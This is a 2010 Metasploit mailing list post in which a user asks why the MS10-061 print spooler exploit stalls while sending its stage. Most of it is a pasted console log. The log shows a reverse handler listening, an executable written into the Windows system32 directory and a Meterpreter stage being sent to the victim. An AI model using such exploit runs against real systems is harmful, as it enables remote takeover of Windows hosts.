Metasploit mailing list archives

Problem exploit ms10_061_spoolss


From: robek loco <robrandom06 () gmail com>
Date: Wed, 13 Oct 2010 10:55:48 +0700

I try to exploit with ms10_062_spoolss, everything run normal but it stop
when sending stage to victim. This is the log

[*] Started reverse handler on 10.10.1.1:4444
[*] Trying target Windows Universal...
[*] Binding to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:10.10.1.2[\spoolss]
...
[*] Bound to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:10.10.1.2[\spoolss]
...
[*] Attempting to exploit MS10-061 via \\10.10.1.2\printer ...
[*] Printer handle: 000000001f12be9a16e111459efffbdfd7c44588
[*] Job started: 0x2
[*] Wrote 73802 bytes to %SystemRoot%\system32\cfnJ71BnTsel9I.exe
[*] Job started: 0x3
[*] Wrote bind request for \\10.10.1.2\PIPE\ATSVC (72 bytes)
[*] Wrote 96 bytes of NetrAddJob request
[*] Everything should be set, waiting up to two minutes for a session...
[*] Sending stage (749056 bytes) to 10.10.1.2

Thx

R0b3k
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

Current thread: